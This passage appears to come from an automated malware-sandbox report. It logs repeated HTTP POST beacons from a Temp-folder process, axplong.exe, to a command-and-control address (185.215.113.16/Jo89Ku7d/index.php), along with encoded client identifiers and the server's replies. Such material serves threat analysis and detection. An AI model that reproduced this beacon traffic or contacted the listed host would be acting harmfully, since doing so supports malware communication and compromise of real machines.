Sep 27, 2024 05:54:07.581659079 CEST	49793	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:54:07.581672907 CEST	49792	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:54:07.581801891 CEST	49793	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:54:07.587429047 CEST	80	49793	185.215.113.16	192.168.2.4
Sep 27, 2024 05:54:08.339982033 CEST	80	49793	185.215.113.16	192.168.2.4
Sep 27, 2024 05:54:08.340116024 CEST	49793	80	192.168.2.4	185.215.113.16

HTTP Request Dependency Graph

185.215.113.16

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:02.895417929 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:03.599792957 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:03.607597113 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:03.964904070 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:04.090979099 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:04.826024055 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:04.827244043 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:05.084682941 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:05.202043056 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:09.207912922 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:09.908310890 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:10.028362036 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:10.818706036 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:10.819758892 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:11.041826963 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:11.153100014 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:11.850214958 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:11.851105928 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:12.079926968 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:12.240636110 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:12.988409996 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:12.993175030 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:13.231659889 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49744	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:13.366993904 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:14.112597942 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:14.113521099 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:14.357228041 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49745	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:14.466485023 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:15.188616037 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:15.205626011 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:15.433603048 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49746	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:15.544646978 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:16.244219065 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:16.245404005 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:16.523679972 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49747	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:16.637823105 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:17.395401955 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:17.396356106 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:17.631607056 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49748	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:17.779239893 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:18.575508118 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:18.583463907 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:18.834453106 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49749	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:18.959789038 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:19.705971003 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:19.706948042 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:19.941138983 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49750	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:20.059847116 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:20.844162941 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
